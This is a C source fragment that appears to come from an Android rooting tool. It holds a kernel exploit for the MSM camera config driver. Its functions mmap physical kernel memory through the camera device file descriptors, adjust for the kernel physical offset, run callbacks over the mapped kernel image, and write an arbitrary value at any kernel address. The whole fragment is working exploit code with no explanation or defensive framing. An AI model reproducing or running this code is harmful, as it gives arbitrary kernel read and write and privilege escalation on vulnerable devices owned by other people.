static bool
attempt_mmap_msm_cameraconfig_exploit(exploit_memory_callback_t callback_func, void *callback_param)
{
unsigned long int offset;
int fd_video, fd_config;
void *address;
bool result;
offset = get_kernel_physical_offset();
if (offset) {
msm_cameraconfig_set_kernel_phys_offset(offset - 0x00008000);
}
address = msm_cameraconfig_mmap(&fd_video, &fd_config);
if (address == MAP_FAILED) {
return false;
}
result = callback_func(msm_cameraconfig_convert_to_mmaped_address((void *)PAGE_OFFSET, address),
KERNEL_SIZE,
callback_param);
msm_cameraconfig_munmap(address, fd_video, fd_config);
return result;
}
bool
msm_cameraconfig_run_exploit(bool(*exploit_callback)(void *mmap_base_address, void *user_data),
void *user_data)
{
void *mapped_address = NULL;
int fd_video;
int fd_config;
bool success;
mapped_address = msm_cameraconfig_mmap(&fd_video, &fd_config);
if (mapped_address == MAP_FAILED) {
return false;
}
success = exploit_callback(mapped_address, user_data);
msm_cameraconfig_munmap(mapped_address, fd_video, fd_config);
return success;
}
bool
msm_cameraconfig_write_value_at_address(unsigned long int address, int value)
{
void *mmap_address = NULL;
int *write_address;
int fd_video;
int fd_config;
mmap_address = msm_cameraconfig_mmap(&fd_video, &fd_config);
if (mmap_address == MAP_FAILED) {
return false;
}
write_address = msm_cameraconfig_convert_to_mmaped_address((void*)address, mmap_address);
*write_address = value;
msm_cameraconfig_munmap(mmap_address, fd_video, fd_config);
return true;
}
